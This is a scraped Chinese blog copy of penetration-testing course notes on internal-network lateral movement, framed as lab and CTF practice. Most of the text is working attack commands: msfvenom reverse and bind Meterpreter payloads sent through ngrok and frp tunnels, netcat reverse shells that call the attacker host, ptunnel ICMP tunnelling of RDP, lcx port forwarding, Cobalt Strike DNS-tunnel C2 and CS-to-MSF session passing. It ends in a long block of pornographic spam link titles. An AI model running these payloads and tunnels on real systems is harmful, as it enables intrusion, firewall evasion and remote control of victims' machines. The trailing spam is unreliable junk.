    配置監聽器


    點擊ADD可以增加監聽器,并且監聽器?持多種協議

    點擊save保存

    監聽狀態
    ?成后?,有多種后?,我們這?選擇Windows


    綁定監聽器,這個后?觸發,就從當前的監聽器?
    上傳到?標服務器

    后?執?后,cs客戶端上線了?標服務器

    點擊視圖,可以看到許多有?的信息,例如當前?戶和已知的拓撲圖

    接下來進?提權操作


    ?帶的只有兩種提權?式

    我們可以加載插件

    上傳插件



    載?成功后,發現提權?式變多了

    選中payload和監聽器

    開始攻擊,如果速度過慢,我們可以重新設置sleep


    出現了?個system,提權成功
    點擊insert進?終端執?命令

    可以輸?help來查看有那些命令

    信息收集

    探針當前?絡環境

    點擊view->Targets

    獲得當前域控列表


    有些dos命令不?持,我們可以調?shell來執?

    通過mimi獲得的密碼可以列表化


    選中主機來進?攻擊


    嘗試連接


    代理問題
    ?主?具可以上傳sadon

    涉及資源∶

    https://github.com/nidem/kerberoast
    https://pan.baidu.com/s/1Vh4ELTFvyBhv3AvztfCw 提取碼∶xiao
    https://github.com/pandasec888/taowu-cobalt-strike
    https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q提取碼∶dtm2
    https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug 提取碼∶taqu
    https://github.com/DeEpinGh0st/Erebus
    https://github.com/rsmudge/ElevateKit
    https://github.com/harleyQu1nn/AggressorScripts
    https://github.com/bluscreenofjeff/AggressorScripts

    內網安全-域橫向內網漫游 Socks 代理隧道技術

    必要基礎知識點:
    1.內外網簡單知識
    2.內網 1 和內網 2 通信問題,可以?代理解決.
    3.正向反向協議通信連接問題

    正向:指正?向連接,控制端連接被控制端
    反向:指反?向連接,被控制端連接控制端
    假如控制端是公?,被控是內?,如果,你直接去找在內?被控的是?法找到的。可以讓被控端 去找控制端

    4.內網穿透代理隧道技術說明
    隧道主要是解決流量分析?具,流量監控?具,防?墻相關過濾
    代理主要解決?絡連通性問題

    案例 1-內網穿透 Ngrok 測試演示-兩個內網通訊上線

    實驗環境:兩個不同的內網(有網絡)實現穿透控制
    1.注冊-購買-填寫-確認 http://www.ngrok.cc/
    協議:http 本地端口:192.168.76.132:4444
    2.測試:內?1執?后?-免費主機處理-內?2監聽-內?2接收器

    ./sunny clientid id msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.76.132 set lport 4444 exploit

    協議要對應


    攻擊機是?臺kali,在上?下載ngrok并且打開它,clientid為注冊后給的id


    ?標機只要訪問xioadiisec.free.idcfengye.com就可以連接到攻擊機kali
    msf?成后?

    ?標機是win7,將msf的??上傳到?標機,在kali上監聽

    在win7的?標機上執?后?,kali收到會話

    并且在sunny上也看到流量在傳遞

    案例 2-內網穿透 Frp 自建跳板測試-兩個內網通訊上線

    自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們
    1.服務端-下載-解壓-修改-啟動(阿里云主機記得修改安全組配置出入口)
    服務器修改配置文件 frps.ini:
    [common]
    bind_port = 6677

    啟動服務端:
    ./frps -c ./frps.ini

    2.控制端-下載-解壓-修改-啟動
    控制端修改配置文件 frpc.ini:
    [common]
    server_addr = 你的云主機 ip
    server_port = 6677 #frpc 工作端口,必須和上面 frps 保持一致
    [msf]
    type = tcp
    local_ip = 127.0.0.1
    local_port = 5555 #轉發給本機的 5555
    remote_port = 6000 #服務端用 6000 端口轉發給本機

    啟動客戶端:
    ./frpc -c ./frpc.ini

    msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o frp.exe use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 5555 exploit

    3.靶機運行 frp 即可
    msf?成??

    上傳??標主機。
    msf監聽

    ?標機執???,上線

    案例 3-CFS 三層內網漫游安全測試演練-某 CTF 線下 2019

    來源 2019 某 CTF 線下賽真題內網結合 WEB 攻防題庫,涉及 WEB 攻擊,內網代理路由等技術,每臺服務器存在一個 Flag,獲取每一個 Flag 對應一個積分,獲取三個 Flag 結尾。
    Target1:
    探針目標-利用 WEB 漏洞(TP5_RCE)-獲取 webshell 權限-獲取 Flag-Target2
    1.生成后門:
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf
    2.接受反彈:
    use exploit/multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set LHOST 192.168.76.132
    set LPORT 1111
    exploit
    3.信息收集及配置訪問
    獲取網絡接口:run get_local_subnets
    查看路由地址:run autoroute -p
    添加路由地址:run autoroute -s 192.168.22.0/24
    開啟本地代理:
    use auxiliary/server/socks4a
    set srvport 2222
    exploit
    4.利用本地代理接口訪問測試
    設置瀏覽器代理進行訪問測試

    linux:
    配置 proxychains 后調用工具探針 Target2
    /etc/proxychains.conf
    socks4 192.168.76.132 2222
    proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
    -Pn:掃描主機檢測其是否受到數據包過濾軟件或防火墻的保護。
    -sT:掃描 TCP 數據包已建立的連接 connect

    windows:
    利用代理工具 Proxifier 或 SocksCap64 載入代理進行進程訪問測試

    Target2:
    探針目標-利用 WEB 漏洞(SQL 注入)-后臺獲取 webshell 權限-獲取 Flag-Target3
    http://192.168.22.128/index.php?r=vul&keyword=1 #sql 注入
    http://192.168.22.128/index.php?r=admini/public/login #后臺
    http://192.168.22.128/index.php?r=special #后門 shell
    1.生成正向后門:
    msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
    2.訪問接受:
    use exploit/multi/handler
    set payload linux/x64/meterpreter/bind_tcp
    set rhost 192.168.22.128
    set LPORT 3333
    exploit
    3.信息收集及配置訪問
    獲取網絡接口:run get_local_subnets
    查看路由地址:run autoroute -p
    添加路由地址:run autoroute -s 192.168.33.0/24

    環境


    開始
    第?臺主機的192.168.75.148我們可以直接訪問,通過端?掃描,得知開啟了80端?,訪問該端?得到以下內容

    利?ThinkPhP的利??具攻擊

    得到?個命令執?漏洞,寫?webshell在當前?錄為2.php

    使?后?管理?具進?連接


    我們要將它作為?個跳板,使?msf或者CS
    現在使?攻擊機kali
    使?msf?成?個Linux后?

    msf監聽

    將??通過webshell上傳??標主機,執?

    msf接受到會話

    在msf和cs上有?帶的代理
    信息收集,獲取?卡信息,看是否有內?

    除了.76外還有?張.22的?卡,現在?法與他連接
    查看路由,看是否和他建?路由規則

    當前路由為空,添加路由地址,再次查看路由


    現在應該可以和.22進?通信,但只能在msf會話上操作,?法攻擊。我們可以使?msf在本地開啟代理

    這?應該是設置的srvport.

    開始利?代理端?掃描

    掃到.22.128的80端?,直接?瀏覽器?法打開,配置瀏覽器代理,直接選擇Socks v4.

    可以訪問

    源碼中告訴漏洞在哪

    進?SQL注?得到密碼賬戶

    通過robots.txt得到登錄地址,登錄后臺

    可以通過后臺功能得到webshell,可以往??寫websehll
    觀察?站url查找規律

    ??具連接后?。這?推薦蟻劍,可以設置代理

    連接成功

    也可以使?Proxifier全局代理?具,
    還有SocksCap64進程代理?具。

    加載代理,然后再將webshell管理?具在代理隧道中允許

    使?msf?成正向后?綁定本機3333端?,然后再去尋找?標機

    將??通過websell上傳??標主機,msf監聽

    ?標機執???,msf上線

    得到?絡環境,添加路由


    重復之前的操作
    使?nmap -script=all掃描漏洞

    內網安全-域橫向網絡&傳輸&應用層隧道技術

    必備知識點:
    1.代理和隧道技術區別?
    代理主要是解決訪問問題,隧道主要解決安全攔截問題。
    2.隧道技術為了解決什么?
    隧道主要解決安全攔截問題。
    3.隧道技術前期的必備條件?
    已經獲得?定的控制權,但是不能對控制的東?進?信息收集或執?它上?的東? 在數據通信被攔截的情況下利?隧道技術封裝改變通信協議進?繞過攔截 CS、MSF?法上線,數據傳輸不穩定?回顯,出?數據被監控,?絡通信存在問題等

    在實際的網絡中,通常會通過各種邊界設備、軟/硬件防火墻甚至入侵檢測系統來檢查對外連接情況,如果發現異樣,就會對通信進行阻斷。那么什么是隧道呢?這里的隧道,就是一種繞過端口屏蔽的通信方式。防火墻兩端的數據包通過防火墻所允許的數據包類型或端口進行封裝,然后穿過防火墻,與對方進行通信。當封裝的數據包到達目的地時,將數據包還原,并將還原后的數據包發送到相應服務器上。

    常用的隧道技術有以下三種:
    網絡層:IPv6 隧道、ICMP 隧道
    傳輸層:TCP 隧道、UDP 隧道、常規端口轉發
    應用層:SSH 隧道、HTTP/S 隧道、DNS 隧道

    實驗環境:

    案例 1-網絡傳輸應用層檢測連通性-檢測

    1. TCP 協議 用“瑞士軍刀”——netcat 執行 nc 命令:nc <IP> <端口> 2. HTTP 協議 用“curl”工具,執行 curl <IP 地址:端口>命令。如果遠程主機開啟了相應的端口,且內網可連接外網的 話,就會輸出相應的端口信息 3. ICMP 協議 用“ping”命令,執行 ping <IP 地址/域名> 4. DNS 協議 檢測 DNS 連通性常用的命令是“nslookup”和“dig” nslookup 是 windows 自帶的 DNS 探測命令 dig 是 linux 系統自帶的 DNS 探測命令

    案例 2-網絡層 ICMP 隧道 ptunnel 使用-檢測,利用

    kali2020-Target2-Target3

    pingtunnel 是把 tcp/udp/sock5 流量偽裝成 icmp 流量進行轉發的工具 -p ##表示連接 icmp 隧道另一端的機器 IP(即目標服務器) -lp ##表示需要監聽的本地 tcp 端口 -da ##指定需要轉發的機器的 IP(即目標內網某一機器的內網 IP) -dp ##指定需要轉發的機器的端口(即目標內網某一機器的內網端口) -x ##設置連接的密碼 Webserver:./ptunnel -x xiaodi Hacker xiaodi:./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #轉發的 3389 請求數據給本地 1080 Hacker xiaodi:rdesktop 127.0.0.1 1080

    老版本介紹:https://github.com/f1vefour/ptunnel(需自行編譯)
    新版本介紹:https://github.com/esrrhs/pingtunnel(二次開發版)

    前期要將?具上傳?Target2
    在webserver上運行程序

    再在kali主機上執?命令

    發現有流量傳過來

    連接本地1080端?,

    彈出遠程連接端?

    在Target3上我們發現3389端?正在被Target2請求,實際上是kali請求的

    現在遠程連接它?的不是以前的那個協議,?是ICMP流量的數據
    把3389流量轉成了ICMP流量

    案例 3-傳輸層轉發隧道 Portmap 使用-檢測,利用(???)

    端?轉發,環境是域環境
    windows: lcx
    linux:portmap
    lcx -slave 攻擊 IP 3131 127.0.0.1 3389 //將本地 3389 給攻擊 IP 的 3131
    lcx -listen 3131 3333 //監聽 3131 轉發至 3333



    ?kali連接WEbserver的7777

    案例 4-傳輸層轉發隧道 Netcat 使用-檢測,利用,功能

    Kali2020-god\webserver-god\sqlserver|dc
    1.雙向連接反彈 shell
    正向:攻擊連接受害
    受害:nc -ldp 1234 -e /bin/sh //linux
    nc -ldp 1234 -e c:\windows\system32\cmd.exe //windows
    攻擊:nc 192.168.76.132 1234 //主動連接



    反彈回會話

    反向:受害連接攻擊
    攻擊:nc -lvp 1234
    受害:nc 攻擊主機 IP 1234 -e /bin/sh
    nc 攻擊主機 IP 1234 -e c:\windows\system32\cmd.exe


    反彈回shell

    2.多向連接反彈 shell-配合轉發
    反向:
    god\Webserver:Lcx.exe -listen 2222 3333
    god\Sqlserver:nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe
    kali 或本機:nc -v 192.168.76.143 3333



    直接反彈回來了shell
    正向該怎么操作呢?實戰中改怎么選擇正向和反向?
    3.相關 netcat 主要功能測試
    指紋服務:nc -nv 192.168.76.143
    端口掃描:nc -v -z 192.168.76.143 1-100

    端口監聽:nc -lvp xxxx
    文件傳輸:nc -lp 1111 >1.txt|nc -vn xx.xx.x.x 1111 <1.txt -q 1
    反彈 Shell:見上

    案例 5-應用層 DNS 隧道配合 CS 上線-檢測,利用,說明

    當常見協議監聽器被攔截時,可以換其他協議上線,其中 dns 協議上線基本通殺
    1.云主機 Teamserver 配置端口 53 啟用-udp
    2.買一個域名修改解析記錄如下:
    A 記錄->cs 主機名->CS 服務器 IP
    NS 記錄->ns1 主機名->上個 A 記錄地址
    NS 記錄->ns2 主機名->上個 A 記錄地址

    3.配置 DNS 監聽器內容如下:
    ns1.xiaodi8.com
    ns2.xiaodi8.com
    cs.xiaodi8.com

    在cs中添加監聽器

    4.生成后門執行上線后啟用命令:
    beacon> checkin
    [*] Tasked beacon to checkin
    beacon> mode dns-txt

    xiaodi-pc\xiaodi

    執?完命令之后

    ?成后?:

    上傳后?,執?,上線

    dns上線后視圖中的電腦和其他協議不同,速度慢,還要執??條命令才能?

    學隧道的意義?
    測試的協議可能會被攔截。 有個?站是有80端? ,http服務的。有漏洞,但訪問不了,?訪問就斷斷續續或直接訪問不到。原因可能是對?防?墻禁?你的IP訪問或者檢測到有異常,這個時候,如果去搞的話,都是http協議,我們可以換個協議去搞。

    域橫向 CS&MSF 聯動shell


    ?標機

    啟動CS服務端

    啟動CS客戶端

    ?標機執???,在CS上上線
    啟動MSF

    接下來,將CS移交到MSF上,?先,有創建?個監聽器,host是msf所在服務器IP


    在msf上創建監聽器,payload要和cs監聽器協議?樣,端?也要?樣

    想要反彈哪個會話,點擊視圖中對應的電腦,選擇Spawn


    在msf處上線

    從msf到cs,先記錄要返回session的id


    ?前三臺主機在cs上

    現在成了4臺

    總結

    以上是生活随笔為你收集整理的内网安全“小迪安全课堂笔记”域横向的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    热久久这里只有精品 | 激情婷婷丁香 | 国产福利一区二区三区视频 | 成年人黄色免费看 | 国产精品成人免费一区久久羞羞 | 久草在线视频免赞 | 看片网站黄 | 一区二区三区四区五区在线 | 精品天堂av | 久久免费影院 | 久久久久久久免费观看 | 色资源网在线观看 | 精品少妇一区二区三区在线 | 亚洲综合导航 | 亚洲精品午夜国产va久久成人 | 日日爽天天 | 欧美精品在线观看一区 | 国产精品久久久久久久久软件 | 日韩高清一 | 人人要人人澡人人爽人人dvd | 色婷婷久久一区二区 | 91视频电影 | 丁香花中文在线免费观看 | 热re99久久精品国产66热 | 久久午夜羞羞影院 | 麻豆影视在线观看 | 午夜精品一区二区三区免费 | 天天草夜夜 | 国产香蕉97碰碰久久人人 | 国产色女人 | 在线免费av观看 | 在线观看免费视频你懂的 | 中文字幕黄色网址 | 天天爱天天爽 | 特级西西444www大精品视频免费看 | 国产精品国产三级国产aⅴ9色 | 狠狠干,狠狠操 | 精品一区二区免费在线观看 | 97色综合| www..com黄色片 | 欧美最新大片在线看 | 久久香蕉一区 | 天天干天天在线 | 久久午夜网 | 中文在线a√在线 | 99久久精品国产免费看不卡 | 一区二区日韩av | 天天天天色综合 | 国产美女在线精品免费观看 | 欧美一级片免费播放 | 国产精品福利在线观看 | 99re热精品视频 | 天天操人人要 | 国产精品美女网站 | 97av影院| 人人插人人舔 | 一区二区在线电影 | 日日干天天 | 欧美一区,二区 | 玖玖玖国产精品 | 精品一区二区免费视频 | 丁香高清视频在线看看 | 亚洲精品视频久久 | 国产精品不卡 | 黄a网站| 又黄又爽又无遮挡免费的网站 | 免费av视屏| 色资源中文字幕 | 日韩在线观看视频一区二区三区 | 亚洲精品伦理在线 | 干综合网| 97品白浆高清久久久久久 | 一区在线电影 | 国产无遮挡又黄又爽馒头漫画 | 91网站在线视频 | 久久久久久久av | 国产中文字幕三区 | 狠狠躁日日躁夜夜躁av | 99久久国产免费看 | 国内精品久久久久久 | 日韩精品欧美专区 | av免费播放 | 久久国产精品久久精品 | 国产精品 视频 | 免费色av| 91网站观看 | 激情综合中文娱乐网 | 日本一区二区不卡高清 | 欧美亚洲专区 | 精壮的侍卫呻吟h | 一区二区国产精品 | 九九热只有精品 | 综合在线亚洲 | 国产亚洲精品精品精品 | 国产小视频在线观看免费 | 制服丝袜亚洲 | 97在线观看 | 91成人天堂久久成人 | 国产va饥渴难耐女保洁员在线观看 | 九九久久久久久久久激情 | 狠狠躁夜夜躁人人爽视频 | 啪啪免费视频网站 | 人人舔人人爽 | 国产精品毛片一区二区在线 | 国产福利一区二区三区在线观看 | 一区二区三区中文字幕在线 | 香蕉成人在线视频 | 99在线视频精品 | 成年人app网址 | 日韩av在线一区二区 | 免费一级片久久 | 99国产视频在线 | 日韩精品不卡 | 亚洲理论片 | 中文字幕电影网 | 亚洲精品国产自产拍在线观看 | 亚洲 欧美 另类人妖 | 国产免费成人 | 美女网站在线免费观看 | 91精品国产九九九久久久亚洲 | 欧美日韩一区二区三区不卡 | 精品久久久久久久 | 国产一级电影免费观看 | 99久久精品一区二区成人 | 人人干天天干 | 国产精品v欧美精品 | 日韩在线观看免费 | 最近中文字幕视频网 | 少妇精69xxtheporn | 免费一级特黄录像 | 最新日韩视频 | 人人插人人| 亚洲成人一区 | 亚洲午夜精品福利 | 国产美女搞久久 | 日韩视频在线不卡 | 国产精品永久免费在线 | 成人黄色在线观看视频 | av观看在线观看 | 91精品色| 欧美成人精品欧美一级乱 | 99精品免费在线观看 | 精品女同一区二区三区在线观看 | 精品国产三级a∨在线欧美 免费一级片在线观看 | 日韩91在线| 91精品小视频 | 国产精品美女在线 | 成人亚洲综合 | 中文字幕乱码一区二区 | www免费看片com | 91尤物国产尤物福利在线播放 | 日韩综合精品 | 玖玖爱国产在线 | 久久综合激情 | 国产精品福利av | 精品国内自产拍在线观看视频 | 天天插天天干天天操 | 91久久精品一区 | 草久在线观看视频 | 日韩在线视频网 | 在线小视频 | 成人黄色影片在线 | 精品久久久久久亚洲综合网站 | 日韩高清黄色 | 中文字幕在线播放第一页 | 国产a视频免费观看 | 国产精品视频 | 亚洲精品www.| 日本久久久久久科技有限公司 | h动漫中文字幕 | 国产精品毛片一区二区三区 | 亚洲精品黄 | 婷婷久久一区 | 91福利区一区二区三区 | 欧美日韩不卡在线观看 | 欧美色图亚洲图片 | 国产91成人在在线播放 | 欧美日韩在线视频观看 | 亚洲综合国产精品 | 片网址| 中文字幕在线国产 | 91天天操| 国产成人精品av久久 | 天天曰天天射 | 亚洲免费av电影 | 激情综合网五月婷婷 | 亚洲专区中文字幕 | 国产黄色美女 | 亚洲激情五月 | 91色视频 | 久久久91精品国产一区二区精品 | 欧美黄色成人 | 久色网| 亚洲国内精品在线 | 天天操夜夜干 | 天天激情综合 | 久久国产精品色婷婷 | 国产精品福利午夜在线观看 | 日韩精品视频免费在线观看 | 中文字幕视频一区 | 国产人成一区二区三区影院 | 日韩一区二区三免费高清在线观看 | 在线观看日韩 | 精品国产一区二区三区久久久蜜月 | 日本69hd| 国产情侣一区 | 精品成人网 | 超碰97国产精品人人cao | 伊在线视频 | 亚洲免费成人av电影 | 国产伦理精品一区二区 | 国产精品观看在线亚洲人成网 | 久久影视中文字幕 | 波多野结衣一区 | 欧美激情视频一区二区三区免费 | 在线观看av麻豆 | av一区二区三区在线播放 | 日本性久久 | 91av免费在线观看 | 精品福利av| 99在线视频免费观看 | 国精产品999国精产品视频 | 我要色综合天天 | 精品国偷自产国产一区 | a色视频 | 国产一区二区在线影院 | 91精品一区国产高清在线gif | 国产精品初高中精品久久 | 成年人看片 | 日韩资源在线 | 久久精品久久精品久久精品 | 在线观看视频中文字幕 | 在线观看91 | 色婷婷狠狠五月综合天色拍 | 欧美一区免费观看 | 天天操夜夜操 | 久久人91精品久久久久久不卡 | 国产成人黄色 | 国产精彩视频一区 | av片一区二区 | 亚洲精品国产精品乱码不99热 | 日韩精选在线观看 | 91av欧美 | 国语对白少妇爽91 | 五月婷婷另类国产 | 国产精品小视频网站 | 国产九九热视频 | 中文字幕av播放 | 久久99亚洲精品 | 久久久久99精品成人片三人毛片 | 久久精品国产第一区二区三区 | 国产日韩视频在线观看 | 在线视频 区| 九九视频网站 | 久久国产一区二区三区 | 性色va| 日韩成人一级大片 | 久爱精品在线 | 夜色成人网 | 中文字幕日本在线 | 99久久精品免费看国产免费软件 | 国产 日韩 欧美 中文 在线播放 | 91中文字幕视频 | 99爱精品在线| 中文字幕91 | 日韩在线二区 | 国产精品av久久久久久无 | 天天射天天舔天天干 | 免费亚洲黄色 | 成人免费视频免费观看 | 国产免费高清 | 色姑娘综合网 | 99精品久久99久久久久 | 在线观看国产一区二区 | 91精品视频播放 | 欧美亚洲国产精品久久高清浪潮 | 天天干人人干 | 国产精品中文字幕在线播放 | 欧美久久久久久久久中文字幕 | 美腿丝袜一区二区三区 | 天天干天天玩天天操 | 久草久视频| 最近免费中文字幕mv在线视频3 | 国产在线一线 | www.色婷婷 | 婷婷99 | 超碰在线97国产 | 日韩欧美区 | japanesefreesex中国少妇 | 国产亚洲欧美精品久久久久久 | 日韩爱爱网站 | 蜜臀一区二区三区精品免费视频 | 深爱五月激情网 | 视频在线观看一区 | 黄色视屏免费在线观看 | 欧美精品一区二区三区四区在线 | 成人欧美亚洲 | 在线视频日韩精品 | 免费色视频在线 | 97av.com | 婷婷丁香花五月天 | 天天躁天天狠天天透 | 免费在线观看av的网站 | 亚洲综合情| 欧美日在线 | www免费视频com━ | 欧美色图视频一区 | 精品天堂av| 香蕉视频久久 | 激情五月亚洲 | 国产只有精品 | 国产香蕉97碰碰碰视频在线观看 | 国内久久久 | 国产一区二区三区四区在线 | 中文字幕在线观 | 国产亚洲在线视频 | 狠狠插天天干 | 天天干天天在线 | 久久一级片 | 国产视频一区在线播放 | 成人av资源在线 | 久久精品91久久久久久再现 | 国产精品白丝jk白祙 | 日韩字幕 | 国产视频综合在线 | 日韩性网站 | 97超碰国产精品 | 国产小视频你懂的 | 欧美高清成人 | 久草视频国产 | 黄色av在 | 亚洲电影免费 | 精品黄色在线观看 | 六月色婷 | 天天射综合网视频 | 精品国产欧美 | 五月综合在线观看 | av资源中文字幕 | 中文日韩在线 | 欧美另类tv | www色,com| 九九热在线免费观看 | 97超级碰 | 成人免费网站在线观看 | 国产精品视频永久免费播放 | 在线观看香蕉视频 | 久艹视频在线免费观看 | 天天色天天草天天射 | 国产精品毛片一区视频播 | 国产一级视频免费看 | 亚洲国产手机在线 | 丁香六月婷婷激情 | 欧美久久九九 | 国产精品久久久久久久久久久久久 | 精品一区二区精品 | 婷婷丁香在线 | 超碰在线公开免费 | 国产一二三区av | 亚洲欧美日韩在线看 | 亚洲精品国产高清 | 国产精品久久一区二区三区, | 最新国产精品视频 | 国产一区二区精 | 久久试看 | 亚洲黄网址 | 国产精品久久久99 | 青青草国产免费 | 五月天天色| 成人黄大片 | 久久草av | 日本视频久久久 | 久久久久久久精 | freejavvideo日本免费 | 国内精品久久久精品电影院 | www.人人草 | 精品视频一区在线 | 亚洲区视频在线观看 | 一区 二区 精品 | 国产精品 中文字幕 亚洲 欧美 | 国产在线欧美 | 日韩网站一区二区 | 不卡的av在线播放 | 色噜噜日韩精品一区二区三区视频 | 日韩精品一区二区三区免费观看视频 | 日日碰夜夜爽 | 成年人免费av网站 | 日韩三级不卡 | 激情五月婷婷丁香 | 欧美国产精品一区二区 | 亚洲一区二区视频在线 | 波多野结衣在线观看一区 | 在线观看理论 | 欧美精品久久久久久久久久白贞 | 久久精品艹 | 国产色在线,com | 免费影视大全推荐 | 青青草国产免费 | 亚洲综合射 | 国产人成在线视频 | 天天操天天干天天爱 | 亚州av成人 | 五月天激情在线 | 四虎影视国产精品免费久久 | av日韩精品 | 免费看的毛片 | 超碰人人乐 | 最近中文字幕在线中文高清版 | 亚洲精品乱码久久久久久写真 | 久久精品电影院 | 少妇做爰k8经典 | 午夜久操 | 中文字幕一区二区三区四区视频 | 色偷偷97| 日本韩国在线不卡 | 亚洲免费av在线 | 欧美日韩亚洲第一页 | 久久av网| 欧美91视频 | 婷婷五月在线视频 | 亚洲色图av | 免费看黄视频 | 久久久久久久久久久久久久免费看 | 国产一区在线免费观看 | 97精品电影院 | 免费在线黄色av | 黄色一级大片免费看 | 日韩免费视频在线观看 | 亚洲精品在线免费 | 亚洲欧美偷拍另类 | 精品国产乱码久久久久久久 | 日韩毛片在线免费观看 | 国产一级在线视频 | 91黄色小网站 | 国产精品高潮呻吟久久av无 | 国产成人精品国内自产拍免费看 | 日韩激情视频 | 色播五月婷婷 | 成年人天堂com | 在线播放日韩av | 成+人+色综合 | 国产在线播放不卡 | 精品视频成人 | 亚洲全部视频 | 91视频在线免费看 | 亚洲情感电影大片 | 亚洲成av人电影 | 久久99精品久久久久久 | 欧美日韩高清免费 | 日批视频国产 | 精品久久久久久亚洲综合网 | 亚洲精品午夜久久久久久久 | 日韩精品免费在线播放 | 久久涩视频 | 日韩特级片| 亚洲精品在线观看av | 国产96精品 | 天天操福利视频 | 成人网在线免费视频 | 少妇激情久久 | 黄色av高清| 欧美日韩三级在线观看 | 97干com| 国产成人无码AⅤ片在线观 日韩av不卡在线 | 久久久久五月 | 三级a视频 | 999视频网 | 久草色在线观看 | 四虎国产视频 | 亚洲精品乱码久久久久久久久久 | 手机看片中文字幕 | 2023亚洲精品国偷拍自产在线 | 一区二区三区四区免费视频 | 91网站免费观看 | 色综合中文综合网 | 亚洲免费av电影 | 在线播放国产一区二区三区 | www.天天色 | 免费视频成人 | 999电影免费在线观看2020 | 91福利在线观看 | 超碰公开97| 亚洲午夜精品一区 | 欧美日韩亚洲第一页 | 91完整版在线观看 | 国产一区二区不卡视频 | 丰满少妇在线观看资源站 | 欧美俄罗斯性视频 | 曰韩精品 | 欧美精品国产综合久久 | 在线观看香蕉视频 | 69精品视频| 人人爽人人爽人人爽 | 亚洲精品乱码久久久一二三 | 午夜av在线免费 | 国产精品黄色在线观看 | av一级免费 | 国产一级片一区二区三区 | www最近高清中文国语在线观看 | 亚洲精品字幕在线 | 久久久网站 | 一区二区三区 中文字幕 | 免费毛片一区二区三区久久久 | 国产视频在线观看一区 | 中文字幕一区二区三区久久蜜桃 | 手机在线欧美 | 久久久影视 | 久久人人爽人人片av | 99r在线| 欧美aaa一级 | 国产精品视频在线看 | 久草资源在线 | a级国产乱理论片在线观看 伊人宗合网 | 999视频在线播放 | 国产精品福利在线 | 在线黄色毛片 | 欧美一级免费高清 | 国产区免费在线 | 97国产电影 | 97视频免费在线观看 | 天天综合网久久综合网 | 欧美日韩久久不卡 | 福利视频一区二区 | 黄色精品在线看 | 97人人超碰在线 | 国产老太婆免费交性大片 | 精品国产乱码一区二区三区在线 | 久久夜色精品国产亚洲aⅴ 91chinesexxx | 国产日韩精品一区二区三区在线 | 国内精品视频久久 | 成人香蕉视频 | 中文字幕电影在线 | 国产不卡高清 | 日韩视频中文字幕在线观看 | 99在线热播精品免费99热 | 手机在线永久免费观看av片 | 青青五月天| 国产成人三级一区二区在线观看一 | 国产黄色片一级三级 | 国产欧美综合在线观看 | 男女精品久久 | 草久视频在线观看 | 麻豆 videos| 91免费在线| 在线观看91精品视频 | 国产成人不卡 | 精品国产视频一区 | 2022久久国产露脸精品国产 | 久久综合影院 | 国产99免费 | 超碰人人在线 | 国产精品11 | 国产激情电影综合在线看 | 高清不卡免费视频 | 另类老妇性bbwbbw高清 | 香蕉视频久久 | 中文字幕一区在线观看视频 | 激情综合五月 | 亚州日韩中文字幕 | 日日躁夜夜躁xxxxaaaa | 香蕉视频4aa | 亚洲欧洲视频 | 国产视频网站在线观看 | 久久99久久99精品免视看婷婷 | 国产精品v a免费视频 | 91九色在线播放 | 日日夜夜噜| 国产婷婷精品av在线 | 四川妇女搡bbbb搡bbbb搡 | 久久亚洲影院 | 色av资源网| 久久成人毛片 | 国产不卡精品 | 色偷偷av男人天堂 | 欧美一区二区三区在线 | 麻豆视频在线免费观看 | 国产123av| 在线免费观看视频你懂的 | 中文日韩在线视频 | 国产精品免费观看网站 | 久久免费精品 | 免费麻豆 | 国产视频1区2区3区 久久夜视频 | 欧美国产高清 | 久久久精品欧美一区二区免费 | 亚洲一区二区三区四区精品 | 综合网婷婷 | 五月宗合网| 色婷婷精品 | 在线亚洲激情 | 99久久99久久精品免费 | 亚洲日本va中文字幕 | 黄色成人免费电影 | 久久视频一区 | 欧美韩国日本在线观看 | 日韩欧美在线不卡 | 欧美午夜性| 久久婷亚洲五月一区天天躁 | 国产黄色片一级三级 | 国产精品久久久免费看 | 麻豆视频在线看 | 日韩伦理一区二区三区av在线 | 亚欧洲精品视频在线观看 | 激情久久久久久久久久久久久久久久 | 国产资源在线免费观看 | 久久久久观看 | 成人亚洲精品久久久久 | 中文字幕精品一区二区三区电影 | 少妇按摩av | 亚洲一级免费电影 | 国内亚洲精品 | 久久综合一本 | 黄色软件网站在线观看 | 久久精品国产一区二区三 | 国产黄色片一级 | 正在播放国产精品 | 日本女人逼 | 国产自产高清不卡 | 亚洲日韩中文字幕在线播放 | 香蕉精品视频在线观看 | 欧美巨乳网 | 麻豆一二三精选视频 | 欧美韩日在线 | 亚洲视频在线播放 | 欧美二区视频 | 在线观看色网站 | 国产免费一区二区三区最新6 | 久草成人在线 | 麻豆免费看片 | 久操视频在线观看 | 欧美日韩国产二区 | 欧洲精品码一区二区三区免费看 | 91av网址 | 99国产视频 | 久久精品久久精品久久 | 国产精品日韩在线播放 | 91精品爽啪蜜夜国产在线播放 | 五月天婷婷在线视频 | 精品资源在线 | 一级免费黄色 | 日日夜夜狠狠 | 激情开心站 | 99精品视频免费看 | 精品亚洲免费视频 | 狠狠操夜夜| 精品一区二区在线免费观看 | 久艹视频免费观看 | 午夜在线观看一区 | 久久综合导航 | 免费高清在线一区 | 久久婷婷综合激情 | 91天堂素人约啪 | 99久在线精品99re8热视频 | 久久精品国产久精国产 | 99精品在线免费视频 | 国产麻豆果冻传媒在线观看 | 91精彩在线视频 | 亚洲自拍av在线 | 久久国内精品 | 一级做a视频 | 亚洲国产网站 | 99自拍视频在线观看 | 日韩电影在线观看中文字幕 | 国产九九精品视频 | 久久免费公开视频 | 成人一级在线观看 | 国产录像在线观看 | 玖玖玖在线| 久久精品91视频 | 久久艹在线观看 